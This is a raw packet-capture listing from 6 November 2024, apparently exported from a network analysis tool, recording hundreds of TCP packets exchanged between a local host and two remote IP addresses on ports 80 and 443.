                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364285946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364306927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364317894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364331007 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364362001 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364447117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364456892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364466906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364479065 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364490032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364490032 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364523888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364535093 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364548922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364559889 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364572048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364587069 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364598036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364614010 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364617109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364630938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364640951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364645004 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364658117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364669085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364671946 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364681005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364691973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364701986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364715099 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364739895 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364801884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364813089 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364823103 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364844084 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364849091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364861965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364872932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364886999 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364890099 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364908934 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364911079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364923000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364940882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364945889 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364953041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364974976 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.364989042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365005970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365024090 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365055084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365067005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365077019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365086079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365108967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365109921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365122080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365133047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365154982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365159035 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365168095 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365180969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365192890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365192890 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365204096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365214109 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365216017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365242004 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365242004 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365256071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365267038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365278006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365278959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365291119 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365299940 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365300894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.365323067 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393615007 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393641949 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393692017 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393704891 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393723965 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.393743992 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404732943 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404772043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404784918 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404788971 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404817104 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404855013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404876947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404887915 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404901028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404912949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404922962 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404942989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404953957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404962063 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404964924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404972076 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404978037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.404990911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405004025 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405004978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405020952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405030966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405041933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405051947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405067921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405071974 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405081987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405093908 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405102015 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405108929 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405109882 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405127048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405144930 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405145884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405157089 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405169010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405180931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405181885 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405200005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405203104 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405214071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405225992 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405239105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405246973 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405251026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405263901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405266047 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405287027 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405303955 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405319929 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405337095 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405343056 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405349970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405361891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405368090 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405371904 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405386925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405400038 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405405045 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405416965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405422926 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405430079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405447006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405450106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405458927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405471087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405473948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405488014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405498028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405508041 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405510902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405525923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405536890 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405539989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405560017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405563116 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405579090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405591965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405602932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405605078 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405616999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405622959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405630112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405642986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405658007 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405661106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405669928 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405675888 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405705929 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405807018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405818939 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405828953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405846119 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405858994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405872107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405883074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405894041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405895948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405905962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405914068 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405920029 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405941010 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405941963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405960083 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.405980110 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406034946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406045914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406061888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406084061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406096935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406100988 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406110048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406141043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406261921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406279087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406295061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406306028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406316042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406320095 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406327963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406342983 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406342983 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406356096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406361103 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406369925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406387091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406394958 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406399965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406411886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406420946 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406429052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406445026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406450033 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406456947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406471014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406474113 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406482935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406496048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406497002 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406507015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406518936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406527996 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406528950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406541109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406544924 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406553030 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406564951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406573057 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406577110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406589985 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406599998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406599998 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406611919 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406620026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406622887 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406636000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406644106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406668901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406668901 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406681061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406697989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406708002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406713963 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406722069 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406735897 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406738997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406752110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406763077 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406765938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406797886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406832933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406845093 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406866074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406879902 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406883001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406900883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406912088 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406929016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406934977 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406944036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406949997 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406955957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406966925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406975031 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406985998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.406996965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407007933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407010078 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407030106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407042027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407044888 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407068968 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407069921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407088041 CET8049719185.215.113.16192.168.2.5
